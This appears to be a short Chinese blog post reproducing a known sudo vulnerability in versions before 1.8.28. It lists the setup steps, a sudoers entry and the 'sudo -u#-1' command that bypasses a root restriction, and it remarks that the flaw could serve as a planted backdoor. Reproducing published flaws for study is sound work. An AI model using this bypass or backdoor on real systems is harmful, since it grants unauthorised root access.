本文最后更新于 2019年10月17日,共计 132 字,欢迎文章底部讨论。

影响范围

sudo是linux下普通用户使用root权限的命令,sudo配置文件中使用 ALL 语句,可以使普通账号通过vim执行root权限命令。

影响 sudo 1.8.28 之前的所有版本。

漏洞复现

  • 1.查看版本 sudo -V

2019-10-17T15:51:13.png

  • 2.新建普通账号
useradd test
passwd test
  • 3.修改sudo文件

vi /etc/sudoers 添加 test ALL=(ALL:ALL) ALL
2019-10-17T15:51:26.png

  • 4.以普通用户test编辑执行命令

普通执行,是查看不了root权限的文件。
执行 sudo -u#-1 命令
2019-10-17T15:51:39.png

漏洞有点鸡肋,需先修改sudoers文件,顶多做个预留后门,后期使普通账户拥有最高权限。

文章目录